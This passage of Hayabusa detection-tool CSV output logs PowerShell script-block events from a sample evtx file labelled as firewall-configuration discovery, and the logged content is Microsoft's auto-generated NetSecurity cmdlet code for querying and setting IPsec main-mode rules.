$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 